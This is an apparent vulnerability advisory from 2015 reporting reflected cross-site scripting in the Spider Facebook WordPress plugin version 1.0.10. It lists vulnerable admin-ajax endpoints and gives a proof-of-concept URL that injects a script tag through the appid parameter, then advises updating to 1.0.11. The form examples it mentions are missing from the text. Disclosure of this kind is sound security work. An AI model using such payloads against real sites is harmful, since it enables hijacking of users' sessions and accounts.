Title: WordPress 'WordPress Facebook' plugin - XSS Version: 1.0.10 Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej Date: 2015/01/26 Download: https://wordpress.org/plugins/spider-facebook/ Contacted WordPress: 2015/01/26 ========================================================== ## Description: ========================================================== Spider Facebook is a WordPress integration tool for Facebook.It includes all the available Facebook social plugins and widgets to be added to your web ## XSS: ========================================================== Some parameters are shown unsanitized, making XSS possible. PoC: Log in as admin an submit one of the following forms: Also works with this target url: http://[URL]/wp-admin/admin-ajax.php?action=selectpostsforfacebook& Also works with http://[URL]/wp-admin/admin-ajax.php?action=selectpostsforfacebook& and http://[URL]/wp-admin/admin-ajax.php?action=selectpagesforfacebook& You can also just visit the following URL (no login required): http://[URL]/?task=registration&g_red=1&type=auto&appid=%22%3E%3C/iframe%3E%3Cscript%3Ealert%281%29%3C/script%3E ## Solution ========================================================== Update to version 1.0.11